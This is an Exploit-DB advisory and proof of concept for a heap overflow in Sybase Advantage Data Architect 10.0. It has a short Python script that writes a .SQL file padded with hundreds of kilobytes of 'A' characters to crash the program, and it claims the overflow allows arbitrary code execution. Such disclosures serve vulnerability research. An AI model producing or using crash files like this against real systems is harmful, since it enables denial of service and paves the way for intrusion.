Sybase Advantage Data Architect - '.SQL' Format Heap Overflow

EDB-ID:

15378

CVE:

N/A

Author:

d0lc3

Type:

dos

Platform:

Windows

Published:

2010-11-01

# Exploit Title: Sybase Advantage Data Architect "*.SQL" Format Heap Oveflow RCE
# Date: 2010-10-16
# Author: d0lc3 (@rmallof - http://elotrolad0.blogspot.com/)
# Software Link: http://www.sybase.com/products/databasemanagement/advantagedatabaseserver/data-architect-utility
# Version: 10.0
# Tested on: Windows XP SP3 32 bits SPA
#Summary:
"""
From Sybase.com:
"Advantage Data Architect Utility: A complete data management system for Advantage developers.
Advantage Data Architect assists in designing, creating and maintaining the database layer of 
a developer's applications."

Advantage Data Architect is prone to heap overflow when user opens crafted script file (.SQL) 
with long data inside.
This issue causes a function pointer overwrite, allow us executing arbitrary code (UNICODE).
More info can be found on : http://elotrolad0.blogspot.com/2010/11/sybase-advantage-data-architect-sql.html
"""
EDB Admin comment:
opening the crash file alone is not enough. Once the file is open, type anything in the SQL query window and the crash will occur.
Thx d0lc3 for the clarification. 
"""

#!/usr/bin/python

sql="select * from clients where "
buf="A"*(1024*300)

crash=sql+buf+"="+buf

f=open("crash.sql",'w')
f.write(crash)
f.close()